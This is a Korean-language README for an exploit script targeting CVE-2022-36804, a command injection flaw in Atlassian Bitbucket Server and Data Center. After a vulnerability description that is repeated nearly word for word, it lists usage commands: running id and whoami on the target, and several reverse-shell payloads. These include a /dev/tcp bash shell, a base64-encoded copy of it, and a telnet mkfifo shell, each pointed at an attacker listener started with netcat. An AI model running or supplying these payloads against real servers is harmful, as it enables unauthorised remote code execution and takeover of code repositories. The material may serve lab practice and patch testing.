
Atlassian Bitbucket Server 및 Data Center의 여러 API 엔드포인트에서 치명적인 명령 주입 취약점이 발견되었습니다. 이 취약점은 <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 및 <8.3.1 이전에 릴리스된 모든 Bitbucket Server 및 Data Center 버전에 영향을 미칩니다.
Atlassian Bitbucket Server 및 Data Center의 여러 API 엔드포인트에서 심각한 명령 주입 취약점이 발견되었습니다. 이 취약점은 <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2>, <8.3.1> 이전에 출시된 모든 Bitbucket Server 및 Data Center 버전에 영향을 미칩니다.
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7
172.17.0.3을 사용자의 로컬 IP 주소로 바꾸세요
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
다음 명령으로 netcat 리스너를 시작하세요:
nc -lvp 4444
페이로드 실행 오류가 발생하는 경우 /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1을 base64로 변환하세요.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
여전히 오류가 발생하면 아래 명령을 실행하세요:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
실습을 위해 Windows/Linux 머신에 취약한 버전의 Bitbucket Server를 설치하는 것이 좋습니다. Docker 이미지에 비해 리버스 셸을 획득하기가 더 쉽습니다.
자세한 정보는 여기에서 확인할 수 있습니다.